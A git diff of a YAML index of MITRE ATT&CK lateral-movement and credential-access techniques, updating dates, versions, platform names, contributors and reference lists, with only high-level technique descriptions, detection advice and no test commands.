       x_mitre_detection: |-
         Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
 
@@ -41447,7 +42135,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -41463,66 +42150,67 @@ lateral-movement:
       id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
       created: '2020-02-11T18:28:44.950Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1021/005
         external_id: T1021.005
-      - source_name: The Remote Framebuffer Protocol
-        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
-          Framebuffer Protocol. Retrieved September 20, 2021.
-        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: Attacking VNC Servers PentestLab
+        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+          VNC Servers. Retrieved October 6, 2021.
+        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
       - source_name: MacOS VNC software for Remote Desktop
         description: Apple Support. (n.d.). Set up a computer running VNC software
           for Remote Desktop. Retrieved August 18, 2021.
         url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
-      - source_name: VNC Authentication
-        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
-          September 20, 2021.
-        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
-      - source_name: Hijacking VNC
-        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
-          Access and Crack). Retrieved September 20, 2021.'
-        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+      - source_name: Havana authentication bug
+        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+          seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+        url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
       - source_name: macOS root VNC login without authentication
         description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
           root account without authentication. Retrieved September 20, 2021.
         url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
-      - source_name: VNC Vulnerabilities
-        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
-          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
-        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
       - source_name: Offensive Security VNC Authentication Check
         description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
           6, 2021.
         url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
-      - source_name: Attacking VNC Servers PentestLab
-        description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
-          VNC Servers. Retrieved October 6, 2021.
-        url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
-      - source_name: Havana authentication bug
-        description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
-          seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
-        url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
-      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
-        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
-          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
-          August 19, 2021.'
-        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
       - source_name: Gnome Remote Desktop grd-settings
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
       - source_name: Gnome Remote Desktop gschema
         description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
         url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+      - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+        description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+          Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+          August 19, 2021.'
+        url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+      - source_name: VNC Vulnerabilities
+        description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+          Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+        url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+      - source_name: The Remote Framebuffer Protocol
+        description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+          Framebuffer Protocol. Retrieved September 20, 2021.
+        url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+      - source_name: VNC Authentication
+        description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+          September 20, 2021.
+        url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+      - source_name: Hijacking VNC
+        description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+          Access and Crack). Retrieved September 20, 2021.'
+        url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1021.005
     atomic_tests: []
   T1080:
     technique:
-      modified: '2023-05-31T12:33:20.915Z'
+      modified: '2024-10-15T16:07:36.903Z'
       name: Taint Shared Content
       description: |2-
 
@@ -41547,11 +42235,11 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
       - Linux
       - macOS
-      x_mitre_version: '1.4'
+      - Office Suite
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Network Share: Network Share Access'
       - 'Process: Process Creation'
@@ -41574,9 +42262,8 @@ lateral-movement:
         url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -41627,7 +42314,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -41691,7 +42377,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -41762,7 +42447,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -41799,7 +42483,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -41830,8 +42514,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -41914,12 +42596,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -41946,6 +42627,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -41963,12 +42645,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41994,14 +42676,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -42119,7 +42800,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -42173,11 +42853,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42229,14 +42908,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42322,12 +43000,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42347,6 +43024,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42354,7 +43032,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42370,39 +43047,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42427,12 +43105,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42446,13 +43123,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -42469,7 +43145,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42517,7 +43193,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -42550,7 +43226,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -42589,7 +43264,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42623,12 +43298,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -42656,10 +43329,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -42689,7 +43361,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -42751,12 +43422,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42780,11 +43450,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -42809,9 +43478,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -42871,7 +43539,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -42926,7 +43593,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -42994,12 +43660,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -43056,6 +43721,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43066,13 +43732,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -43131,7 +43796,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43225,49 +43889,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43282,20 +43907,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
